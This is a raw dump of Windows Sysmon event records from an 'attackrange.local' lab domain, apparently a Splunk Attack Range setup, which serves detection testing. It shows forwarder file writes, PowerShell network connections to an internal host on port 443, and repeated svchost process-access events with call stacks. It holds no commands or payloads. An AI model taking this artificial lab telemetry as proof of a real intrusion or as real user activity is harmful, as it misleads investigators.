Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4E33CCC12B46E1AF47ADB06C68BA4C,SHA256=1DD2344C7FCD7C440FA0A5C775A7971C6F7BBA5B64837B6444A626AC1FD94EC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:18.467{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50357-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:48.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35AC790295AA4678A397939B92F42227,SHA256=ECAA9A68100C29C30397A175B40F3A08AE4B8FBB91768531E3A7E73E15CB43BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:49.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A3CF11B169B296F7CD9EF2468115909,SHA256=AA1989B9BDAE7AD7593C083957CF26191B0C51BA6A3E2E36A72ED67D1F37A138,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:50.584{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE84544590E4652C14551846011CE6D2,SHA256=D7C52419313445D6FC2BC477B3233A40B6AC78662758EB3275B4698CC248B8D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:51.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D6975B3A5968C535976BC36C956EA9,SHA256=8DF7770826F34F0F5C061FF87E84B6C3521F549F7CD7963CD147CB10211D6CD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:52.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA38D247E315176AB86CE160356BDDF1,SHA256=5B8045775584687B4BEA786E8E065311C1B747285693686666C899D18FA46F38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:53.830{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=22DABFB2308238E3A2B8037F8181D29F,SHA256=AAC33A3B24893F00990E30E257019F7752C7C32DB97A7D8B288C6D6EC18088AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:53.680{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888BE66CFC342D207A57FFFF091ABDFA,SHA256=4A2EB87DD37223C804B6A36F9FF12BF75A1A7B6A2F8A25AD55DC1C7454629FAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:22.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50358-false10.0.1.12-8000- 354300x800000000000000036496019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.475{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50359-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:54.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727F6F02958D47E8B1D481214621DB27,SHA256=73F55B05EC08DA122139FEB51D06A44FFC930BC2F5CD0B678B6D251180DABFEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:55.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BF6DAD6224CECB53A591BF234D4C1B,SHA256=32D2EBA9405BBCCD03EDF4A5A0C732F1EC28D5FA7AD7B11F16BCCC1C6D038EED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:56.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=722AEB5E50B0860CE727A2D92D0DBE3F,SHA256=701406557D4FD79043A474CC6DF14AAB83A0A59032A3705B1FE78813CF86CF22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:56.230{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a2be979.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:57.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662A8D25822AF86313284A7E33A809C2,SHA256=C4CFFCE81833E7642968780B61C1569295C8F301907EC65A732215BA27B72B8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:58.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE36ABBFE8B8BDD39B9D8504315E7DE,SHA256=05222C45A84005EA99E21F62E81CF3E635E143517A509FA595486890EBEC5C58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E92103F17EFF0F47311B66D141E5D497,SHA256=F36412ACF3614BC91457D2441A0196197AE0AA14316AA8828D9530B3B7372B5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A680CB8FEDA950F5CC1F18AD4D55F9B,SHA256=97F3C8CF084382621BBDA3288AC11D27A4744B67D56B2B28690BBF7C15970C33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 